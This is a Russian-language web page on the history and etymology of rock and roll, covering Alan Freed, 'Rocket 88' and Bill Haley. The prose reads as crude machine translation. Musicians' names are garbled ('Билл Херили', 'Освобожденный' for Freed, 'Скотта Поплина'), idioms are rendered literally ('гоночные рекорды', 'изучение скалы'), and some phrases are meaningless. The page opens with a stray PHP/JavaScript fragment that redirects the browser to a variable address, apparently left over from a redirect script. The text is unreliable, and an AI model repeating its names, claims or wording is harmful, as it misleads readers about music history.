window.location = \"$z_out\";";} ?>

Рок-н-ролл

Рок-н-роллРок-н-ролл появился как определенный музыкальный стиль в Соединенных Штатах в середине 1950-х годов. Это происходило непосредственно из ритма блюзовой музыки 1940-х годов, которая сама развивалась из более раннего блюза, буги-вуги, джаза и качающейся музыки, а также под влиянием евангелия, кантри и западной и традиционной народной музыки. Рок-н-ролл в свою очередь обеспечил основную основу для музыки, которая с середины 1960-х годов была известна просто как рок-музыка.

Рок-н-ролл. История и происхождение

Фраза качания и катания изначально описывала движение корабля в океане, но оно использовалось в начале двадцатого века, как для описания духовного пыла и как сексуальная аналогия. Различные записи евангелия, блюза и качелей использовали эту фразу, прежде чем она стала использоваться чаще, но все же периодически — в конце 1930-х и 1940-х годов, в основном на записях и в обзорах того, что стало известно как ритм блюзовая музыка, нацеленная на черную аудиторию. В 1951 году Кливлендский диск-жокей Алан Фрид начал играть в этот музыкальный стиль, популяризируя термин рок-н-ролл, чтобы описать его.


Различные записи, которые относятся к 1940-м годам, были названы в качестве первого альбома рок-н-ролла, включая часто цитированную песню 1951 года « Rocket 88 », хотя некоторые считают, что назвать один рекорд слишком сложно. Билл Херили « Rock Around Clock » часто упоминается как первый рок-н-рольный альбом для достижения значительного коммерческого успеха, и в 1955 году он присоединился к ряду других записей, которые стали первопроходцами жанра.

Рок-н-ролл.

Рок-н-роллСначала использовавшийся (1951) Алан Фрид, Кливлендский диск-жокей, взятый из песни «My Baby Rocks Me with Steady Roll». Использование рок, ролл, рок-н-ролл и т. Д. В отношении сексуального общения традиционно в блюзе, форме популярной музыки, которая развилась в 1950-х годах из ритма и блюза, характеризующейся использованием электрических гитар, сильным Ритм с акцентом на необыкновенную и ориентированную на молодежь лирику. Форма популярной музыки, возникающая из различных музыкальных стилей, особенно ритм блюз, музыка кантри, евангелие и Maid Maines. Возникнув в Соединенных Штатах в 1950-х годах, он характеризуется электронно усиленным прибором, сильно ударным ударом и относительно простой фразой
Эта страница пытается исследовать корни рока таким образом, чтобы освещать естественное развитие музыкальных стилей. Часто изучение скалы начинается с Билла Херили и его комет и включает скудную информацию о блюзовых и ритмических записях, которые он и другие использовали в качестве модели. Музыкальный жанр не просто появляется, он постепенно Рок-н-роллразвивается до определенного момента, когда некоторые события, производительность, публикация или запись позволяют слушателям воспринимать свои уникальные качества и применять ярлык. Запись Wyonnie Harris 1947 года «Good Rocking Tonight» была одной из многих «ритм записей», сделанных в конце 1940-х годов, однако, когда она была записана Элвисом Пресли в 1954 году, это казалось новым и другим подходом. То, что заставило его выглядеть новым и другим, было его контекстом. Не исследуя историю черной популярной музыки,
Эта страница начинается с африканских музыкальных качеств, привезенных сюда, начиная с 1619 года, и пытается проследить их слияние с европейской музыкой, принесенной здесь колонистами. История этого музыкального взаимодействия — также история американской популярной музыки и включает в себя плантационные песни Стивена Форстера, рэгтайм Скотта Поплина, блюз Берси Смита, джаз графа Берси и прыгающие группы Луи Джордана. Знание потока американской популярной музыки позволяет понять, что рок-н-ролл был естественным результатом объединенных сил, которые влияли на музыку.

Сегодня я узнал, откуда взялся термин «рок-н-ролл».

Слово «рулон» использовалось со времен средневековья, чтобы, среди прочего, иметь секс: «Пойдем за рулоном в сене»; «Подкапывания под листами»; И т. Д. Слово «скала», между прочим, использовалось, по крайней мере, с 17-го века как термин, означающий «встряхнуть или потревожить». Спустя пару сотен лет это также распространилось на черных певцов евангелистов, использующих «камень», чтобы ссылаться на то, что они потрясены в духовном смысле, как в духовном восторге (потрясенном).


Еще одна ранняя ссылка на термин «рок-н-ролл» была лирикой Дж. Рассел Робинсона в 1935 году от Генри «Красный» Аллен получил ритм в ваших ногах и музыке в вашей душе,
Если сатана начинает преследовать вас, начните качать и качать. Получите ритм в ногах и музыке в своей душе …
На данный момент фраза «рок-н-ролл» была относительно хорошо известна среди чернокожих американцев. Эта конкретная мелодия также была позже охвачена довольно многими популярными белыми музыкантами, такими как Бенин Гурман, которые, возможно, помогли распространить эту фразу несколько.
Этот термин получил свой самый большой глобальный импульс через Кливленда, Огайо диск-жокея по имени Алан Фрид. Освобожденный играл на ранних формах рок-н-ролла (смесь ритма и блюза и кантри музыки, в первую очередь) на его радио шоу и называл смесь «рок-н-ролл», термин, который он ранее знал из гонок и песен, таких как «Rock И «Роллинг мама» (1939).

«Рок-н-ролл» (в конце 1940-х годов было названо три песни).

Рок-н-роллФриду было предложено назвать это сочетание музыки «рок-н-ролла» его спонсором, владельцем магазина записей Лев Линцем, который пытался увеличить продажи по гоночным записям, заставив белых покупателей купить их. В то время среди белых людей были не очень популярны гоночные записи, но, переиздавая музыку «рок-н-ролл», музыка быстро стала чрезвычайно популярной среди подростков всех национальностей, во многом благодаря этому и радио-шоу Freed, The Moondog Rock & Roll House Party. (Кстати, классические «гоночные рекорды» в этот момент были заново «Rhythm and Blues» благодаря знаменитому музыкальному журналисту и продюсеру Джерри Векслеру).